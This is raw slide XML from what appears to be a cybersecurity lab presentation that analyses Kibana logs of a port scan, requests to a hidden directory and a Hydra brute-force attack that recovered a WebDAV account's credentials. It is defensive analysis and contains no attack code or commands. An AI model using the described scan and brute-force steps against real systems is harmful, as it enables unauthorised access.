            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="3400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en" sz="3400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Google Shape;1179;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607600" y="4957200"/>
            <a:ext cx="261720" cy="105120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{067896BE-3B33-4E3C-ABF6-CFD08A1E5060}" type="slidenum">
              <a:rPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Analysis: Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;1186;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="1467720"/>
            <a:ext cx="8408880" cy="2383920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1d8be6">
              <a:alpha val="15000"/>
            </a:srgbClr>
          </a:solid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1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>[Insert Here]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Include a screenshot of Kibana logs depicting the port scan. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="373" name="Google Shape;1187;p66" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="313200" y="835200"/>
            <a:ext cx="424440" cy="330840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247680" y="640440"/>
            <a:ext cx="8620920" cy="971280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="91440" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="320040" indent="-167760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>At approx 02:18:30 am, there was a possible port scan initiated on our server 192.168.1.105.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>There were over 5000 packets that were sent from 192.168.1.90 in a total of about 1 minute. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167760">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>The high initial connections count in a very short amount of time usually indicates a scan. Further analysis into connections going to multiple ports will confirm this data.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="375" name="Google Shape;1189;p66" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1467720"/>
            <a:ext cx="9143640" cy="3675240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw algn="bl" blurRad="57240" dir="5400000" dist="19080" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Analysis: Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Google Shape;1196;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="1467720"/>
            <a:ext cx="8408880" cy="2383920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1d8be6">
              <a:alpha val="15000"/>
            </a:srgbClr>
          </a:solid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1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>[Insert Here]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Include a screenshot of Kibana logs depicting the request for the hidden directory. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="379" name="Google Shape;1197;p67" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="30600" y="1467720"/>
            <a:ext cx="2873880" cy="3675240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298440" y="741240"/>
            <a:ext cx="8692920" cy="971280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="91440" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="320040" indent="-154800">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>The requests for the Hidden Directory “secret_folder” was accessed starting around 2:10am before the brute force attack and then successfully accessed for the contents around 2:30 am. There was a total of 4 requests to the file “connect_to_corp_server” which contained the instructions and password a hash for ryan’s account to access the webdav directory.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="381" name="Google Shape;1199;p67" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="835200"/>
            <a:ext cx="424440" cy="330840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="382" name="Google Shape;1200;p67" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2904840" y="1874880"/>
            <a:ext cx="6238800" cy="1406160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="383" name="Google Shape;1201;p67" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2904840" y="3310560"/>
            <a:ext cx="6238800" cy="18324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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Analysis: Uncovering the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;1208;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="1467720"/>
            <a:ext cx="8408880" cy="2383920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1d8be6">
              <a:alpha val="15000"/>
            </a:srgbClr>
          </a:solid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1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>[Insert Here]</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Include a screenshot of Kibana logs depicting the brute force attack.  </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="741240"/>
            <a:ext cx="8408880" cy="971280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19080">
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="91440" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="457200" indent="-304920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>16,363 total requests were made to the “secret_folder” directory. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-304920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>During the Brute Force attack, out of that total 16,363 requests, 16,359 requests were made before the correct credentials were discovered using Hydra. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="388" name="Google Shape;1210;p68" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367200" y="835200"/>
            <a:ext cx="424440" cy="330840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389" name="Google Shape;1211;p68" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1416240"/>
            <a:ext cx="9143640" cy="2958120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw algn="bl" blurRad="57240" dir="5400000" dist="19080" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Google Shape;1212;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664560" y="3557880"/>
            <a:ext cx="267480" cy="434520"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10708" h="17388">
                <a:moveTo>
                  <a:pt x="3190" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-1997" y="2591"/>
                  <a:pt x="-445" y="18223"/>
                  <a:pt x="5274" y="17269"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10320" y="16428"/>
                  <a:pt x="11654" y="7534"/>
                  <a:pt x="10038" y="2680"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9194" y="145"/>
                  <a:pt x="4969" y="595"/>
                  <a:pt x="2297" y="595"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="ff0000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="391" name="Google Shape;1213;p68" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5806080" y="1467720"/>
            <a:ext cx="3155400" cy="1397160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw algn="bl" blurRad="57240" dir="5400000" dist="19080" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Google Shape;1214;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19512600">
            <a:off x="752400" y="3115080"/>
            <a:ext cx="1161000" cy="39636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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
